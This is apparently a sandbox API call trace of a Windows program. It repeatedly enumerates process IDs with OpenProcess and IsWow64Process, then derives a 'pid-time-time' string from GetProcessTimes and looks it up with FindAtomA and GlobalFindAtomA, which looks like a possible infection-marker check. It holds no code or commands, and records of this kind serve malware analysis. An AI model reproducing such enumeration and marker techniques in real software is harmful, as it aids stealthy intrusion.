	[0114.969] CloseHandle (hObject=0x698) returned 1
	[0114.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.969] CloseHandle (hObject=0x698) returned 1
	[0114.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.970] CloseHandle (hObject=0x698) returned 1
	[0114.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.970] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.970] CloseHandle (hObject=0x698) returned 1
	[0114.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.970] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.971] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.971] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.971] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.971] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.971] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.971] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.972] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.972] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.972] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.972] CloseHandle (hObject=0x698) returned 1
	[0114.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.972] CloseHandle (hObject=0x698) returned 1
	[0114.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.972] CloseHandle (hObject=0x698) returned 1
	[0114.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.972] CloseHandle (hObject=0x698) returned 1
	[0115.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0115.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0115.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0115.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0115.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0115.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0115.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0115.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0115.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0115.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0115.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0115.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0115.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0115.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0115.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0115.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0115.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0115.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0115.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0115.010] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.010] CloseHandle (hObject=0x698) returned 1
	[0115.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0115.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0115.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0115.011] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.011] CloseHandle (hObject=0x698) returned 1
	[0115.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0115.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0115.011] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.011] CloseHandle (hObject=0x698) returned 1
	[0115.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0115.011] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.011] CloseHandle (hObject=0x698) returned 1
	[0115.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0115.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.012] CloseHandle (hObject=0x698) returned 1
	[0115.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0115.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.012] CloseHandle (hObject=0x698) returned 1
	[0115.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0115.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.012] CloseHandle (hObject=0x698) returned 1
	[0115.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0115.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.012] CloseHandle (hObject=0x698) returned 1
	[0115.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0115.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0115.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.013] CloseHandle (hObject=0x698) returned 1
	[0115.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0115.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.013] CloseHandle (hObject=0x698) returned 1
	[0115.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0115.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.013] CloseHandle (hObject=0x698) returned 1
	[0115.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0115.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.013] CloseHandle (hObject=0x698) returned 1
	[0115.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0115.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.014] CloseHandle (hObject=0x698) returned 1
	[0115.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0115.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.053] CloseHandle (hObject=0x698) returned 1
	[0115.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0115.053] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.054] CloseHandle (hObject=0x698) returned 1
	[0115.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0115.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.054] CloseHandle (hObject=0x698) returned 1
	[0115.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0115.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.054] CloseHandle (hObject=0x698) returned 1
	[0115.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0115.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.054] CloseHandle (hObject=0x698) returned 1
	[0115.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0115.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.054] CloseHandle (hObject=0x698) returned 1
	[0115.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0115.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.055] CloseHandle (hObject=0x698) returned 1
	[0115.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0115.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.055] CloseHandle (hObject=0x698) returned 1
	[0115.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0115.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.055] CloseHandle (hObject=0x698) returned 1
	[0115.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0115.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.055] CloseHandle (hObject=0x698) returned 1
	[0115.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0115.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.056] CloseHandle (hObject=0x698) returned 1
	[0115.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0115.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.056] CloseHandle (hObject=0x698) returned 1
	[0115.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0115.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.057] CloseHandle (hObject=0x698) returned 1
	[0115.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0115.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.057] CloseHandle (hObject=0x698) returned 1
	[0115.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0115.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.057] CloseHandle (hObject=0x698) returned 1
	[0115.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0115.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.057] CloseHandle (hObject=0x698) returned 1
	[0115.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0115.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.057] CloseHandle (hObject=0x698) returned 1
	[0115.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.058] CloseHandle (hObject=0x698) returned 1
	[0115.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.058] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.058] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0115.058] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0115.058] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0115.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.059] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0115.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.059] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0115.059] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0115.059] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0115.163] CloseHandle (hObject=0x698) returned 1
	[0115.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0115.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0115.163] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.163] CloseHandle (hObject=0x698) returned 1
	[0115.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0115.163] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.163] CloseHandle (hObject=0x698) returned 1
	[0115.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0115.164] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.164] CloseHandle (hObject=0x698) returned 1
	[0115.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0115.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0115.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0115.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0115.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0115.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0115.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0115.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0115.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0115.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0115.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0115.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0115.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0115.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0115.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0115.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0115.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0115.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0115.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0115.228] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.228] CloseHandle (hObject=0x698) returned 1
	[0115.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0115.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0115.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0115.228] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.228] CloseHandle (hObject=0x698) returned 1
	[0115.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0115.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0115.229] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.229] CloseHandle (hObject=0x698) returned 1
	[0115.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0115.229] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.229] CloseHandle (hObject=0x698) returned 1
	[0115.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0115.229] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.229] CloseHandle (hObject=0x698) returned 1
	[0115.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0115.229] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.229] CloseHandle (hObject=0x698) returned 1
	[0115.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0115.229] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.230] CloseHandle (hObject=0x698) returned 1
	[0115.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0115.230] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.230] CloseHandle (hObject=0x698) returned 1
	[0115.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0115.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0115.230] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.230] CloseHandle (hObject=0x698) returned 1
	[0115.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0115.230] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.230] CloseHandle (hObject=0x698) returned 1
	[0115.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0115.231] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.231] CloseHandle (hObject=0x698) returned 1
	[0115.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0115.231] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.231] CloseHandle (hObject=0x698) returned 1
	[0115.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0115.231] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.231] CloseHandle (hObject=0x698) returned 1
	[0115.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0115.231] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.231] CloseHandle (hObject=0x698) returned 1
	[0115.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0115.242] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.243] CloseHandle (hObject=0x698) returned 1
	[0115.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0115.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.243] CloseHandle (hObject=0x698) returned 1
	[0115.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0115.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.243] CloseHandle (hObject=0x698) returned 1
	[0115.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0115.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.243] CloseHandle (hObject=0x698) returned 1
	[0115.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0115.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.243] CloseHandle (hObject=0x698) returned 1
	[0115.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0115.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.244] CloseHandle (hObject=0x698) returned 1
	[0115.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0115.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.244] CloseHandle (hObject=0x698) returned 1
	[0115.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0115.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.244] CloseHandle (hObject=0x698) returned 1
	[0115.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0115.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.244] CloseHandle (hObject=0x698) returned 1
	[0115.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0115.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.244] CloseHandle (hObject=0x698) returned 1
	[0115.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0115.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.245] CloseHandle (hObject=0x698) returned 1
	[0115.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0115.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.245] CloseHandle (hObject=0x698) returned 1
	[0115.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0115.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.245] CloseHandle (hObject=0x698) returned 1
	[0115.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0115.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.245] CloseHandle (hObject=0x698) returned 1
	[0115.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0115.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.246] CloseHandle (hObject=0x698) returned 1
	[0115.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0115.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.246] CloseHandle (hObject=0x698) returned 1
	[0115.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.246] CloseHandle (hObject=0x698) returned 1
	[0115.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.246] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.247] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0115.247] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0115.247] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0115.247] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.247] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0115.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.294] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0115.294] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
